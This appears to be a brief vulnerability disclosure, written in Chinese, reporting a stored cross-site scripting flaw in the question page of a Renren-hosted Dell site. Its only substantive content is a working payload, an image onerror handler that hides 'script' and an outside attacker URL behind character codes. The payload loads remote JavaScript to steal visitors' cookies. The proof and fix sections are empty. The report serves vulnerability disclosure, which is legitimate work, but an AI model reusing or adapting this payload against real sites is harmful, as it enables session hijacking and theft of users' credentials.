存储型xss,可打cookie,引用某牛的话勿头痛医头脚痛医脚
详细说明:
http://dellcqg.renren.com/Qa/ask 单引号被转义
构造
<img src=1 onerror=document.body.appendChild(document.createElement(String.fromCharCode(115,99,114,105,112,116))).src=String.fromCharCode(104,116,116,112,58,47,47,121,108,97,120,102,99,121,46,53,48,48,121,117,110,46,99,111,109,47,120,120,120,120,115,115,120,120,120,46,106,115)>
可打到cookie
漏洞证明:
修复方案:
我是菜鸟,厂商比我懂的